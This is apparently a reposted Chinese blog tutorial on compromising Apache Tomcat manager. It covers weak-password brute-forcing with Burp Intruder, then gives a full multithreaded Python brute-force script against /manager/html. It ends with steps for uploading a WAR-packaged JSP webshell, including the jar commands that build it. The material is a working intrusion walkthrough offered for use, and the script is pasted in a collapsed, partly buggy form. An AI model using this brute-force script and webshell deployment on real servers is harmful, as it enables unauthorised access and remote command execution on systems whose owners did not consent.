WEB中间件--tomcat爆破,burp和python脚本,getshell,war包
2018-04-26 10:21
1041 查看
1.tomcat 用burpsuit进行弱口令爆破
先抓包![](https://oscdn.geek-share.com/Uploads/Images/Content/201909/27/f7090718acee9c60f14b66c754ba6bf3.png)
![](https://oscdn.geek-share.com/Uploads/Images/Content/201909/27/ece3a12da7fb945a0bf7da28fba5aed4.png)
发送到inturder
![](https://oscdn.geek-share.com/Uploads/Images/Content/201909/27/25d680afff6cb27539ebb494d69c916a.png)
payload type 选择custom iterater
第一个payload选用户名文件,第二个payload用 : 第三个选密码文件
![](https://oscdn.geek-share.com/Uploads/Images/Content/201909/27/d588b806fb5c4435a79ac8f38a0a6168.png)
设置base64加密,和去掉URL编码
![](https://oscdn.geek-share.com/Uploads/Images/Content/201909/27/eee934599776a102fc4c10cd2e00d71e.png)
开始攻击,得到用户名密码
![](https://oscdn.geek-share.com/Uploads/Images/Content/201909/27/61d058e5bffc3e6993be1ac775266e4d.png)
2.用python脚本进行爆破
目前正在学习python,#!/usr/bin/env python # -*- coding: utf-8 -*- #by.really import sys import requests import threading import Queue import time import base64 import os #headers = {'Content-Type': 'application/x-www-form-urlencoded','User-Agent': 'Googlebot/2.1 (+http://www.googlebot.com/bot.html)'} u=Queue.Queue() p=Queue.Queue() n=Queue.Queue() #def urllist() urls=open('url.txt','r') def urllist(): for url in urls: url=url.rstrip() u.put(url) def namelist(): names=open('name.txt','r') for name in names: name=name.rstrip() n.put(name) def passlist(): passwds=open('pass.txt','r') for passwd in passwds: passwd=passwd.rstrip() p.put(passwd) def weakpass(url): namelist() while not n.empty(): name =n.get() #print name passlist() while not p.empty(): good() #name = n.get() passwd = p.get() #print passwd headers = {'Authorization': 'Basic %s==' % (base64.b64encode(name+':'+passwd))} try: r =requests.get(url,headers=headers,timeout=3) #print r.status_code if r.status_code==200: print '[turn] ' +url+' '+name+':'+passwd f = open('good.txt','a+') f.write(url+' '+name+':'+passwd+'\n') f.close() else: print '[false] ' + url+' '+name+':'+passwd except: print '[false] ' + url+' '+name+':'+passwd def list(): while u.empty(): url = u.get() weakpass(name,url) def thread(): urllist() tsk=[] for i in open('url.txt').read().split('\n'): i = i + '/manager/html' t = threading.Thread(target=weakpass,args=(i,)) tsk.append(t) for t in tsk: t.start() t.join(1) #print "current has %d threads" % (threading.activeCount() - 1) def good(): good_ = 0 for i in open('good.txt').read().split('\n'): good_+=1 os.system('title "weakpass------good:%s"' % (good_)) if __name__=="__main__": # alllist() thread()
![](https://oscdn.geek-share.com/Uploads/Images/Content/201909/27/af43e7af36d97b214966086a9efd6bb8.png)
3.getshell
登录成功上传做好的war包,获得shell![](https://oscdn.geek-share.com/Uploads/Images/Content/201909/27/c743ac21eda1b57fa2d618581745d883.png)
成功
![](https://oscdn.geek-share.com/Uploads/Images/Content/201909/27/4925702d6d07d6f1c3b93d0760047970.png)
4.war包制作
jar -cf test.war cmd.jsp jar -cf shell.war cmd1/*
相关文章推荐
- 【脚本语言系列】关于PythonWeb服务器Bottle,你需要知道的事
- python更新tomcat脚本
- Tomcat,Apache等Web中间件有大量 CLOSE_WAIT
- Python脚本报错:selenium.common.exceptions.WebDriverException: Message: Service chromedriver.exe unexpect
- SSH Secure Shell Client+Linux+tomcat+javaweb常用脚本
- selenium_webdriver(python)的第一个脚本
- CTF writeup:python脚本爆破zip密码
- web中间件切换(was切tomcat)
- 【脚本语言系列】关于PythonWeb服务器Flask,你需要知道的事
- Ant脚本将web项目打war包、远程备份更新线上项目
- 开启Tomcat的cgi解析python脚本
- Centos下Web中间件Jboss应用发布start和stop脚本范例
- Shell 脚本 更换tomcat集群war包
- Python版Mssql爆破小脚本
- python脚本网址爆破
- Python访问Mysql及Web脚本编写
- linux+php+apache web调用python脚本权限问题解决方案
- 在Tomcat中部署Java Web应用程序(jar命令打war包)
- python 3 对dns负载均衡环境下的web服务器的监控脚本
- python webdriver执行所有测试用例脚本